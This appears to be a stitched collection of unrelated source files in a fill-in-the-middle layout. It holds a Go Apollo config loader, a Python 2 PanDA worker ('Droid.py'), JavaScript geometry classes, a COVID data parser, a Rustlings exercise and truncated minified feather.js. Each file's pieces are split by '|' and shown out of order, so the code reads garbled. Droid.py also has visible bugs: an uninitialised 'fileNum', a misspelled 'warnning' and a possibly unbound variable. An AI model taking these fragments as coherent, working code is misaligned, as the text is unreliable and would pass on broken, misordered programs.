ConfigCacheExpireTime: 1 * 60,
},
configStartFile: make(map[string]interface{}),
}
return &configUtil
}
func NewConfigWithConfigFile(configFile string) ConfitUtil {
cfg := newDefaultConfigUtil()
cfg.resolveConfig(configFile)
initConfig(cfg)
return *cfg
}
func NewConfigWithApolloInitConfig(config ApolloInitConfig) ConfitUtil {
cfg := newDefaultConfigUtil()
cfg.ApolloInitConfig = config
initConfig(cfg)
return *cfg
}
func (cfg *ConfitUtil) resolveConfig(filename string) {
fs, err := ioutil.ReadFile(filename)
if err != nil {
util.DebugPrintf("Fail to find config file:" + err.Error())
return
}
err = json.Unmarshal(fs, &cfg.configStartFile)
if err != nil {
util.DebugPrintf("Fail to read json config file:" + err.Error())
return
}
}
func initConfig(cfg *ConfitUtil) {
initRefreshTime(cfg)
initHttpTimeout(cfg)
initErrorRetry(cfg)
initCacheExpireTime(cfg)
initMaxCacheSize(cfg)
initLongPollInitDelay(cfg)
initLongpollTimeout(cfg)
initAppId(cfg)
initCluster(cfg)
initDataServer(cfg)
initMetaServer(cfg)
}
func initMetaServer(util *ConfitUtil) | aCenter != "" {
return
}
//其次选择系统环境变量配置
util.DataCenter = os.Getenv("apollo.dataCenter")
}
func initCluster(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.Cluster != "" {
return
}
//其次选择系统环境变量配置
cluster := os.Getenv("apollo.Cluster")
if cluster != "" {
util.Cluster = cluster
return
}
//最后选择配置文件配置
cluster, _ = util.configStartFile["cluster"].(string)
if cluster != "" {
util.Cluster = cluster
return
}
}
func initAppId(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.AppId != "" {
return
}
//其次选择系统环境变量配置
appId := os.Getenv("apollo.appId")
if appId != "" {
util.AppId = appId
return
}
//最后选择配置文件配置
appId, _ = util.configStartFile["appId"].(string)
if appId != "" {
util.AppId = appId
return
}
}
func initLongpollTimeout(util *ConfitUtil) {
longPollingTimeout, _ := util.configStartFile["longPollingTimeout"].(string)
if longPollingTimeout != "" {
util.LongPollingTimeout, _ = time.ParseDuration(longPollingTimeout)
}
}
func initLongPollInitDelay(util *ConfitUtil) {
longPollingInitDelay, _ := util.configStartFile["longPollingInitDelay"].(string)
if longPollingInitDelay != "" {
util.LongPollingInitDelay, _ = time.ParseDuration(longPollingInitDelay)
}
}
func initMaxCacheSize(util *ConfitUtil) {
maxConfigCacheSize, _ := util.configStartFile["maxConfigCacheSize"].(float64)
if maxConfigCacheSize != 0 {
util.MaxConfigCacheSize = int(maxConfigCacheSize)
}
}
func initCacheExpireTime(util *ConfitUtil) {
configCacheExpireTime, _ := util.configStartFile["configCacheExpireTime"].(float64)
if configCacheExpireTime != 0 {
util.ConfigCacheExpireTime = int(configCacheExpireTime)
}
}
func initErrorRetry(util *ConfitUtil) {
onErrorRetryInterval, _ := util.configStartFile["onErrorRetryInterval"].(string)
if onErrorRetryInterval != "" {
util.HttpOnErrorRetryInterval, _ = time.ParseDuration(onErrorRetryInterval)
}
}
func initHttpTimeout(util *ConfitUtil) {
connectTimeout, _ := util.configStartFile["httpTimeout"].(string)
if connectTimeout != "" {
util.HttpTimeout, _ = time.ParseDuration(connectTimeout)
}
}
func initRefreshTime(util *ConfitUtil) {
refreshInterval, _ := util.configStartFile["httpRefreshInterval"].(string)
if refreshInterval != "" {
util.HttpRefreshInterval, _ = time.ParseDuration(refreshInterval)
}
}
| {
//优先选择用户运行时代码设置的
if util.MetaServer != "" {
return
}
//其次选择系统环境变量配置
metaCenter := os.Getenv("apollo.metaServer")
if metaCenter != "" {
util.MetaServer = metaCenter
return
}
//最后选择配置文件配置
metaCenter, _ = util.configStartFile["metaServer"].(string)
if metaCenter != "" {
util.MetaServer = metaCenter
}
}
func initDataServer(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.Dat |
Droid.py | import commands
import json
import os
import shutil
import sys
import time
import pickle
import signal
from os.path import abspath as _abspath, join as _join
from pandayoda.yodacore import Interaction,Database,Logger
from EventServer.EventServerJobManager import EventServerJobManager
class Droid:
def __init__(self, globalWorkingDir, localWorkingDir):
self.__globalWorkingDir = globalWorkingDir
self.__localWorkingDir = localWorkingDir
self.__currentDir = None
self.__comm = Interaction.Requester()
self.__tmpLog = Logger.Logger()
self.__esJobManager = None
self.__rank = self.__comm.getRank()
self.__tmpLog.info("Rank %s: Global working dir: %s" % (self.__rank, self.__globalWorkingDir))
self.initWorkingDir()
self.__tmpLog.info("Rank %s: Current working dir: %s" % (self.__rank, self.__currentDir))
self.__poolFileCatalog = None
self.__inputFiles = None
self.__copyInputFiles = None
signal.signal(signal.SIGTERM, self.stop)
def initWorkingDir(self):
# Create separate working directory for each rank
curdir = _abspath (self.__localWorkingDir)
wkdirname = "rank_%s" % str(self.__rank)
wkdir = _abspath (_join(curdir,wkdirname))
if not os.path.exists(wkdir):
os.makedirs (wkdir)
os.chdir (wkdir)
self.__currentDir = wkdir
def postExecJob(self):
if self.__copyInputFiles and self.__inputFiles is not None and self.__poolFileCatalog is not None:
for inputFile in self.__inputFiles:
localInputFile = os.path.join(os.getcwd(), os.path.basename(inputFile))
self.__tmpLog.debug("Rank %s: Remove input file: %s" % (self.__rank, localInputFile))
os.remove(localInputFile)
if self.__globalWorkingDir != self.__localWorkingDir:
command = "mv " + self.__currentDir + " " + self.__globalWorkingDir
self.__tmpLog.debug("Rank %s: copy files from local working directory to global working dir(cmd: %s)" % (self.__rank, command))
status, output = commands.getstatusoutput(command)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
def setup(self, job):
#try:
if True:
self.__poolFileCatalog = job.get('PoolFileCatalog', None)
self.__inputFiles = job.get('InputFiles', None)
self.__copyInputFiles = job.get('CopyInputFiles', False)
if self.__copyInputFiles and self.__inputFiles is not None and self.__poolFileCatalog is not None:
for inputFile in self.__inputFiles:
shutil.copy(inputFile, './')
pfc_name = os.path.basename(self.__poolFileCatalog)
pfc_name = os.path.join(os.getcwd(), pfc_name)
pfc_name_back = pfc_name + ".back"
shutil.copy2(self.__poolFileCatalog, pfc_name_back)
with open(pfc_name, 'wt') as pfc_out:
with open(pfc_name_back, 'rt') as pfc_in:
for line in pfc_in:
pfc_out.write(line.replace('HPCWORKINGDIR', os.getcwd()))
job["AthenaMPCmd"] = job["AthenaMPCmd"].replace('HPCWORKINGDIR', os.getcwd())
self.__esJobManager = EventServerJobManager(self.__rank)
self.__esJobManager.initMessageThread(socketname='EventService_EventRanges', context='local')
self.__esJobManager.initTokenExtractorProcess(job["TokenExtractCmd"])
self.__esJobManager.initAthenaMPProcess(job["AthenaMPCmd"])
return True, None
#except Exception, e:
# errMsg = "Failed to init EventServerJobManager: %s" % str(e)
# self.__esJobManager.terminate()
# return False, errMsg
def getJob(self):
request = {'Test':'TEST'}
self.__tmpLog.debug("Rank %s: getJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('getJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
job = output["job"]
if statusCode == 0:
return True, job
return False, None
def getEventRanges(self):
request = {'nRanges': 1}
self.__tmpLog.debug("Rank %s: getEventRanges(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('getEventRanges',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
eventRanges = output['eventRanges']
if statusCode == 0:
return True, eventRanges
return False, None
def updateEventRange(self, output):
try:
eventRangeID = output.split(",")[1]
except Exception, e:
self.__tmpLog.warnning("Rank %s: failed to get eventRangeID from output: %s" % (self.__rank, output))
self.__tmpLog.warnning("Rank %s: error message: %s" % (self.__rank, str(e)))
request = {"eventRangeID": eventRangeID,
'eventStatus':" finished",
"output": output}
self.__tmpLog.debug("Rank %s: updateEventRange(request: %s)" % (self.__rank, request))
retStatus, retOutput = self.__comm.sendRequest('updateEventRange',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, retStatus, retOutput))
if retStatus:
statusCode = retOutput["StatusCode"]
if statusCode == 0:
return True
return False
def finishJob(self):
request = {'state': 'finished'}
self.__tmpLog.debug("Rank %s: updateJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('updateJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
if statusCode == 0:
return True
return False
def failedJob(self):
request = {'state': 'failed'} | statusCode = output["StatusCode"]
if statusCode == 0:
return True
return False
def waitYoda(self):
self.__tmpLog.debug("Rank %s: WaitYoda" % (self.__rank))
while True:
status, output = self.__comm.waitMessage()
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
state = output["State"]
if statusCode == 0 and state == 'finished':
return True
return True
def run(self):
self.__tmpLog.info("Droid Starts")
status, job = self.getJob()
self.__tmpLog.info("Rank %s: getJob(%s)" % (self.__rank, job))
if not status:
self.__tmpLog.debug("Rank %s: Failed to get job" % self.__rank)
self.failedJob()
return -1
status, output = self.setup(job)
self.__tmpLog.info("Rank %s: setup job(status:%s, output:%s)" % (self.__rank, status, output))
if not status:
self.__tmpLog.debug("Rank %s: Failed to setup job(%s)" % (self.__rank, output))
self.failedJob()
return -1
# main loop
failedNum = 0
#self.__tmpLog.info("Rank %s: isDead: %s" % (self.__rank, self.__esJobManager.isDead()))
while not self.__esJobManager.isDead():
#self.__tmpLog.info("Rank %s: isDead: %s" % (self.__rank, self.__esJobManager.isDead()))
#self.__tmpLog.info("Rank %s: isNeedMoreEvents: %s" % (self.__rank, self.__esJobManager.isNeedMoreEvents()))
if self.__esJobManager.isNeedMoreEvents():
self.__tmpLog.info("Rank %s: need more events" % self.__rank)
status, eventRanges = self.getEventRanges()
# failed to get message again and again
if not status:
fileNum += 1
if fileNum > 30:
self.__tmpLog.warning("Rank %s: failed to get events more than 30 times. finish job" % self.__rank)
self.__esJobManager.insertEventRange("No more events")
else:
continue
else:
fileNum = 0
self.__tmpLog.info("Rank %s: get event ranges(%s)" % (self.__rank, eventRanges))
if len(eventRanges) == 0:
self.__tmpLog.info("Rank %s: no more events" % self.__rank)
self.__esJobManager.insertEventRange("No more events")
for eventRange in eventRanges:
self.__esJobManager.insertEventRange(eventRange)
self.__esJobManager.poll()
output = self.__esJobManager.getOutput()
if output is not None:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
time.sleep(2)
self.__esJobManager.flushMessages()
output = self.__esJobManager.getOutput()
while output:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
output = self.__esJobManager.getOutput()
self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
self.postExecJob()
self.__tmpLog.info("Rank %s: finish job" % self.__rank)
self.finishJob()
self.waitYoda()
return 0
def stop(self, signum=None, frame=None):
self.__tmpLog.info('Rank %s: stop signal received' % self.__rank)
self.__esJobManager.terminate()
self.__esJobManager.flushMessages()
output = self.__esJobManager.getOutput()
while output:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
output = self.__esJobManager.getOutput()
self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
self.postExecJob()
self.__tmpLog.info("Rank %s: finish job" % self.__rank)
self.finishJob()
self.__tmpLog.info('Rank %s: stop' % self.__rank)
def __del__(self):
self.__tmpLog.info('Rank %s: __del__ function' % self.__rank)
#self.__esJobManager.terminate()
#self.__esJobManager.flushMessages()
#output = self.__esJobManager.getOutput()
#while output:
# self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
# self.updateEventRange(output)
# output = self.__esJobManager.getOutput()
#self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
#self.postExecJob()
#self.__tmpLog.info("Rank %s: finish job" % self.__rank)
#self.finishJob()
self.__tmpLog.info('Rank %s: __del__ function' % self.__rank) | self.__tmpLog.debug("Rank %s: updateJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('updateJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status: |
maths.js | "use strict";
Object.defineProperty(exports, "__esModule", { value: true });
var Vector2 = /** @class */ (function () {
function Vector2(x, y) {
this.x = x || 0;
this.y = y || 0;
}
return Vector2;
}());
exports.Vector2 = Vector2;
var Vector3 = /** @class */ (function () {
function Vector3(x, y, z) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
}
return Vector3;
}());
exports.Vector3 = Vector3;
var Vector4 = /** @class */ (function () {
function Vector4(x, y, z, w) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
this.w = w || 0;
}
return Vector4;
}());
exports.Vector4 = Vector4;
var Rectangle = /** @class */ (function () {
function Rectangle(x, y, width, height) {
this.x = x || 0;
this.y = y || 0;
this.width = width || 0;
this.height = height || 0;
}
return Rectangle;
}());
exports.Rectangle = Rectangle;
var NPatchInfo = /** @class */ (function () {
function NPatchInfo(rect, type, l, t, r, b) {
this.sourceRect = rect; | this.right = r;
this.bottom = b;
}
return NPatchInfo;
}());
exports.NPatchInfo = NPatchInfo;
var Ray = /** @class */ (function () {
function Ray(pos, dir) {
this.position = pos || new Vector3(0, 0, 0);
this.direction = dir || new Vector3(0, 0, 0);
}
return Ray;
}());
exports.Ray = Ray;
var RayHitInfo = /** @class */ (function () {
function RayHitInfo(hit, distance, position, normal) {
this.hit = hit;
this.distance = distance;
this.position = position;
this.normal = normal;
}
return RayHitInfo;
}());
exports.RayHitInfo = RayHitInfo; | this.type = type;
this.left = l;
this.top = t; |
nl_authority.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from typing import Any, Dict, List
from pandas import DataFrame, concat, merge
from lib.pipeline import DataSource
from lib.time import datetime_isoformat
from lib.utils import grouped_diff
class NetherlandsDataSource(DataSource):
| def parse_dataframes(
self, dataframes: List[DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
# Rename the appropriate columns
data = dataframes[0].rename(
columns={
"Date_of_report": "date",
"Municipality_code": "subregion2_code",
"Municipality_name": "subregion2_name",
"Province": "subregion1_name",
"Total_reported": "confirmed",
"Hospital_admission": "hospitalized",
"Deceased": "deceased",
}
)
# Drop data without a clear demarcation
data = data[~data.subregion1_name.isna()]
data = data[~data.subregion2_code.isna()]
data = data[~data.subregion2_name.isna()]
# Get date in ISO format
data.date = data.date.apply(lambda x: datetime.fromisoformat(x).date().isoformat())
# Make sure the region code is zero-padded and without prefix
data["subregion2_code"] = data["subregion2_code"].apply(lambda x: x[2:])
data = data.drop(columns=["subregion1_name", "subregion2_name"])
data = data.merge(aux["metadata"], on="subregion2_code")
# We only need to keep key-date pair for identification
data = data[["date", "key", "confirmed", "deceased", "hospitalized"]]
# Compute the daily counts
data = grouped_diff(data, ["key", "date"])
# Group by level 2 region, and add the parts
l2 = data.copy()
l2["key"] = l2.key.apply(lambda x: x[:5])
l2 = l2.groupby(["key", "date"]).sum().reset_index()
# Group by country level, and add the parts
l1 = l2.copy().drop(columns=["key"])
l1 = l1.groupby("date").sum().reset_index()
l1["key"] = "NL"
# Output the results
return concat([l1, l2, data]) |
|
types.ts | export interface Options {
// entry path
entry?: string;
// whether to support pc-side component props
pc?: boolean; | } |
|
generated_restore_from_backup_input.go | package client
const (
RESTORE_FROM_BACKUP_INPUT_TYPE = "restoreFromBackupInput"
)
type RestoreFromBackupInput struct {
Resource
BackupId string `json:"backupId,omitempty" yaml:"backup_id,omitempty"`
}
type RestoreFromBackupInputCollection struct {
Collection
Data []RestoreFromBackupInput `json:"data,omitempty"`
client *RestoreFromBackupInputClient
}
type RestoreFromBackupInputClient struct {
kuladoClient *KuladoClient
}
type RestoreFromBackupInputOperations interface {
List(opts *ListOpts) (*RestoreFromBackupInputCollection, error)
Create(opts *RestoreFromBackupInput) (*RestoreFromBackupInput, error)
Update(existing *RestoreFromBackupInput, updates interface{}) (*RestoreFromBackupInput, error)
ById(id string) (*RestoreFromBackupInput, error)
Delete(container *RestoreFromBackupInput) error
}
func | (kuladoClient *KuladoClient) *RestoreFromBackupInputClient {
return &RestoreFromBackupInputClient{
kuladoClient: kuladoClient,
}
}
func (c *RestoreFromBackupInputClient) Create(container *RestoreFromBackupInput) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doCreate(RESTORE_FROM_BACKUP_INPUT_TYPE, container, resp)
return resp, err
}
func (c *RestoreFromBackupInputClient) Update(existing *RestoreFromBackupInput, updates interface{}) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doUpdate(RESTORE_FROM_BACKUP_INPUT_TYPE, &existing.Resource, updates, resp)
return resp, err
}
func (c *RestoreFromBackupInputClient) List(opts *ListOpts) (*RestoreFromBackupInputCollection, error) {
resp := &RestoreFromBackupInputCollection{}
err := c.kuladoClient.doList(RESTORE_FROM_BACKUP_INPUT_TYPE, opts, resp)
resp.client = c
return resp, err
}
func (cc *RestoreFromBackupInputCollection) Next() (*RestoreFromBackupInputCollection, error) {
if cc != nil && cc.Pagination != nil && cc.Pagination.Next != "" {
resp := &RestoreFromBackupInputCollection{}
err := cc.client.kuladoClient.doNext(cc.Pagination.Next, resp)
resp.client = cc.client
return resp, err
}
return nil, nil
}
func (c *RestoreFromBackupInputClient) ById(id string) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doById(RESTORE_FROM_BACKUP_INPUT_TYPE, id, resp)
if apiError, ok := err.(*ApiError); ok {
if apiError.StatusCode == 404 {
return nil, nil
}
}
return resp, err
}
func (c *RestoreFromBackupInputClient) Delete(container *RestoreFromBackupInput) error {
return c.kuladoClient.doResourceDelete(RESTORE_FROM_BACKUP_INPUT_TYPE, &container.Resource)
}
| newRestoreFromBackupInputClient |
help.py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
''' help.py '''
from heron.common.src.python.utils.log import Log
from heron.tools.cli.src.python.result import SimpleResult, Status
from heron.tools.common.src.python.utils import config
def create_parser(subparsers):
'''
:param subparsers:
:return:
'''
parser = subparsers.add_parser(
'help',
help='Prints help for commands',
add_help=True)
# pylint: disable=protected-access
parser._positionals.title = "Required arguments"
parser._optionals.title = "Optional arguments"
parser.add_argument(
'help-command',
nargs='?',
default='help',
help='Provide help for a command')
parser.set_defaults(subcommand='help')
return parser
# pylint: disable=unused-argument,superfluous-parens
def run(command, parser, args, unknown_args):
| '''
:param command:
:param parser:
:param args:
:param unknown_args:
:return:
'''
# get the command for detailed help
command_help = args['help-command']
# if no command is provided, just print main help
if command_help == 'help':
parser.print_help()
return SimpleResult(Status.Ok)
# get the subparser for the specific command
subparser = config.get_subparser(parser, command_help)
if subparser:
print(subparser.format_help())
return SimpleResult(Status.Ok)
Log.error("Unknown subcommand \'%s\'", command_help)
return SimpleResult(Status.InvocationError) |
|
iterators2.rs | // iterators2.rs
// In this module, you'll learn some of unique advantages that iterators can offer
// Step 1. Complete the `capitalize_first` function to pass the first two cases
// Step 2. Apply the `capitalize_first` function to a vector of strings, ensuring that it returns a vector of strings as well
// Step 3. Apply the `capitalize_first` function again to a list, but try and ensure it returns a single string
// As always, there are hints below!
pub fn capitalize_first(input: &str) -> String {
let mut c = input.chars();
match c.next() {
None => String::new(),
Some(first) => first.to_uppercase().to_string() + c.as_str(),
}
}
#[cfg(test)]
mod tests {
use super::*;
// Step 1.
// Tests that verify your `capitalize_first` function implementation
#[test]
fn test_success() {
assert_eq!(capitalize_first("hello"), "Hello");
}
#[test]
fn test_empty() |
// Step 2.
#[test]
fn test_iterate_string_vec() {
let words = vec!["hello", "world"];
let capitalized_words: Vec<String> = words.iter().map(|w| capitalize_first(w)).collect();
assert_eq!(capitalized_words, ["Hello", "World"]);
}
#[test]
fn test_iterate_into_string() {
let words = vec!["hello", " ", "world"];
let capitalized_words = words
.iter()
.map(|w| capitalize_first(w))
.fold(String::new(), |acc, w| acc + &w);
assert_eq!(capitalized_words, "Hello World");
}
}
// Step 1
// You need to call something on `first` before it can be collected
// Currently its type is `char`. Have a look at the methods that are available on that type:
// https://doc.rust-lang.org/std/primitive.char.html
// Step 2
// First you'll need to turn the Vec into an iterator
// Then you'll need to apply your function unto each item in the vector
// P.s. Don't forget to collect() at the end!
// Step 3.
// This is very similar to the previous test. The only real change is that you will need to
// alter the type that collect is coerced into. For a bonus you could try doing this with a
// turbofish
| {
assert_eq!(capitalize_first(""), "");
} |
margin_auto_left_child_bigger_than_parent.rs | pub fn | () -> stretch::result::Layout {
stretch::node::Node::new(
stretch::style::Style {
justify_content: stretch::style::JustifyContent::Center,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(52f32),
height: stretch::style::Dimension::Points(52f32),
..Default::default()
},
..Default::default()
},
vec![&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(72f32),
height: stretch::style::Dimension::Points(72f32),
..Default::default()
},
margin: stretch::geometry::Rect { start: stretch::style::Dimension::Auto, ..Default::default() },
..Default::default()
},
vec![],
)],
)
.compute_layout(stretch::geometry::Size::undefined())
.unwrap()
}
| compute |
feather.min.js | ! function (e, n) {
"object" == typeof exports && "object" == typeof module ? module.exports = n() : "function" == typeof define && define.amd ? define([], n) : "object" == typeof exports ? exports.feather = n() : e.feather = n()
}("undefined" != typeof self ? self : this, function () {
return function (e) {
var n = {};
function i(t) {
if (n[t]) return n[t].exports;
var l = n[t] = {
i: t,
l: !1,
exports: {}
};
return e[t].call(l.exports, l, l.exports, i), l.l = !0, l.exports
}
return i.m = e, i.c = n, i.d = function (e, n, t) {
i.o(e, n) || Object.defineProperty(e, n, {
configurable: !1,
enumerable: !0,
get: t
})
}, i.r = function (e) {
Object.defineProperty(e, "__esModule", {
value: !0
})
}, i.n = function (e) {
var n = e && e.__esModule ? function () {
return e.default
} : function () {
return e
};
return i.d(n, "a", n), n
}, i.o = function (e, n) {
return Object.prototype.hasOwnProperty.call(e, n)
}, i.p = "", i(i.s = 80)
}([function (e, n, i) {
(function (n) {
var i = "object",
t = function (e) {
return e && e.Math == Math && e
};
e.exports = t(typeof globalThis == i && globalThis) || t(typeof window == i && window) || t(typeof self == i && self) || t(typeof n == i && n) || Function("return this")()
}).call(this, i(75))
}, function (e, n) {
var i = {}.hasOwnProperty;
e.exports = function (e, n) {
return i.call(e, n)
}
}, function (e, n, i) {
var t = i(0),
l = i(11),
r = i(33),
o = i(62),
a = t.Symbol,
c = l("wks");
e.exports = function (e) {
return c[e] || (c[e] = o && a[e] || (o ? a : r)("Symbol." + e))
}
}, function (e, n, i) {
var t = i(6);
e.exports = function (e) {
if (!t(e)) throw TypeError(String(e) + " is not an object");
return e
}
}, function (e, n) {
e.exports = function (e) {
try {
return !!e()
} catch (e) {
return !0
}
}
}, function (e, n, i) {
var t = i(8),
l = i(7),
r = i(10);
e.exports = t ? function (e, n, i) {
return l.f(e, n, r(1, i))
} : function (e, n, i) {
return e[n] = i, e
}
}, function (e, n) {
e.exports = function (e) {
return "object" == typeof e ? null !== e : "function" == typeof e
}
}, function (e, n, i) {
var t = i(8),
l = i(35),
r = i(3),
o = i(18),
a = Object.defineProperty;
n.f = t ? a : function (e, n, i) {
if (r(e), n = o(n, !0), r(i), l) try {
return a(e, n, i)
} catch (e) {}
if ("get" in i || "set" in i) throw TypeError("Accessors not supported");
return "value" in i && (e[n] = i.value), e
}
}, function (e, n, i) {
var t = i(4);
e.exports = !t(function () {
return 7 != Object.defineProperty({}, "a", {
get: function () {
return 7
}
}).a
})
}, function (e, n) {
e.exports = {}
}, function (e, n) {
e.exports = function (e, n) {
return {
enumerable: !(1 & e),
configurable: !(2 & e),
writable: !(4 & e),
value: n
}
}
}, function (e, n, i) {
var t = i(0),
l = i(19),
r = i(17),
o = t["__core-js_shared__"] || l("__core-js_shared__", {});
(e.exports = function (e, n) {
return o[e] || (o[e] = void 0 !== n ? n : {})
})("versions", []).push({
version: "3.1.3",
mode: r ? "pure" : "global",
copyright: "© 2019 Denis Pushkarev (zloirock.ru)"
})
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = o(i(43)),
l = o(i(41)),
r = o(i(40));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
n.default = Object.keys(l.default).map(function (e) {
return new t.default(e, l.default[e], r.default[e])
}).reduce(function (e, n) {
return e[n.name] = n, e
}, {})
}, function (e, n) {
e.exports = ["constructor", "hasOwnProperty", "isPrototypeOf", "propertyIsEnumerable", "toLocaleString", "toString", "valueOf"]
}, function (e, n, i) {
var t = i(72),
l = i(20);
e.exports = function (e) {
return t(l(e))
}
}, function (e, n) {
e.exports = {}
}, function (e, n, i) {
var t = i(11),
l = i(33),
r = t("keys");
e.exports = function (e) {
return r[e] || (r[e] = l(e))
}
}, function (e, n) {
e.exports = !1
}, function (e, n, i) {
var t = i(6);
e.exports = function (e, n) {
if (!t(e)) return e;
var i, l;
if (n && "function" == typeof (i = e.toString) && !t(l = i.call(e))) return l;
if ("function" == typeof (i = e.valueOf) && !t(l = i.call(e))) return l;
if (!n && "function" == typeof (i = e.toString) && !t(l = i.call(e))) return l;
throw TypeError("Can't convert object to primitive value")
}
}, function (e, n, i) {
var t = i(0),
l = i(5);
e.exports = function (e, n) {
try {
l(t, e, n)
} catch (i) {
t[e] = n
}
return n
}
}, function (e, n) {
e.exports = function (e) {
if (void 0 == e) throw TypeError("Can't call method on " + e);
return e
}
}, function (e, n) {
var i = Math.ceil,
t = Math.floor;
e.exports = function (e) {
return isNaN(e = +e) ? 0 : (e > 0 ? t : i)(e)
}
}, function (e, n, i) {
var t;
/*!
Copyright (c) 2016 Jed Watson.
Licensed under the MIT License (MIT), see
http://jedwatson.github.io/classnames
*/
/*!
Copyright (c) 2016 Jed Watson.
Licensed under the MIT License (MIT), see
http://jedwatson.github.io/classnames
*/
! function () {
"use strict";
var i = function () {
function e() {}
function n(e, n) {
for (var i = n.length, t = 0; t < i; ++t) l(e, n[t])
}
e.prototype = Object.create(null);
var i = {}.hasOwnProperty;
var t = /\s+/;
function l(e, l) {
if (l) {
var r = typeof l;
"string" === r ? function (e, n) {
for (var i = n.split(t), l = i.length, r = 0; r < l; ++r) e[i[r]] = !0
}(e, l) : Array.isArray(l) ? n(e, l) : "object" === r ? function (e, n) {
for (var t in n) i.call(n, t) && (e[t] = !!n[t])
}(e, l) : "number" === r && function (e, n) {
e[n] = !0
}(e, l)
}
}
return function () {
for (var i = arguments.length, t = Array(i), l = 0; l < i; l++) t[l] = arguments[l];
var r = new e;
n(r, t);
var o = [];
for (var a in r) r[a] && o.push(a);
return o.join(" ")
}
}();
void 0 !== e && e.exports ? e.exports = i : void 0 === (t = function () {
return i
}.apply(n, [])) || (e.exports = t)
}()
}, function (e, n, i) {
var t = i(7).f,
l = i(1),
r = i(2)("toStringTag");
e.exports = function (e, n, i) {
e && !l(e = i ? e : e.prototype, r) && t(e, r, {
configurable: !0,
value: n
})
}
}, function (e, n, i) {
var t = i(20);
e.exports = function (e) {
return Object(t(e))
}
}, function (e, n, i) {
var t = i(1),
l = i(24),
r = i(16),
o = i(63),
a = r("IE_PROTO"),
c = Object.prototype;
e.exports = o ? Object.getPrototypeOf : function (e) {
return e = l(e), t(e, a) ? e[a] : "function" == typeof e.constructor && e instanceof e.constructor ? e.constructor.prototype : e instanceof Object ? c : null
}
}, function (e, n, i) {
"use strict";
var t, l, r, o = i(25),
a = i(5),
c = i(1),
p = i(2),
y = i(17),
h = p("iterator"),
x = !1;
[].keys && ("next" in (r = [].keys()) ? (l = o(o(r))) !== Object.prototype && (t = l) : x = !0), void 0 == t && (t = {}), y || c(t, h) || a(t, h, function () {
return this
}), e.exports = {
IteratorPrototype: t,
BUGGY_SAFARI_ITERATORS: x
}
}, function (e, n, i) {
var t = i(21),
l = Math.min;
e.exports = function (e) {
return e > 0 ? l(t(e), 9007199254740991) : 0
}
}, function (e, n, i) {
var t = i(1),
l = i(14),
r = i(68),
o = i(15),
a = r(!1);
e.exports = function (e, n) {
var i, r = l(e),
c = 0,
p = [];
for (i in r) !t(o, i) && t(r, i) && p.push(i);
for (; n.length > c;) t(r, i = n[c++]) && (~a(p, i) || p.push(i));
return p
}
}, function (e, n, i) {
var t = i(0),
l = i(11),
r = i(5),
o = i(1),
a = i(19),
c = i(36),
p = i(37),
y = p.get,
h = p.enforce,
x = String(c).split("toString");
l("inspectSource", function (e) {
return c.call(e)
}), (e.exports = function (e, n, i, l) {
var c = !!l && !!l.unsafe,
p = !!l && !!l.enumerable,
y = !!l && !!l.noTargetGet;
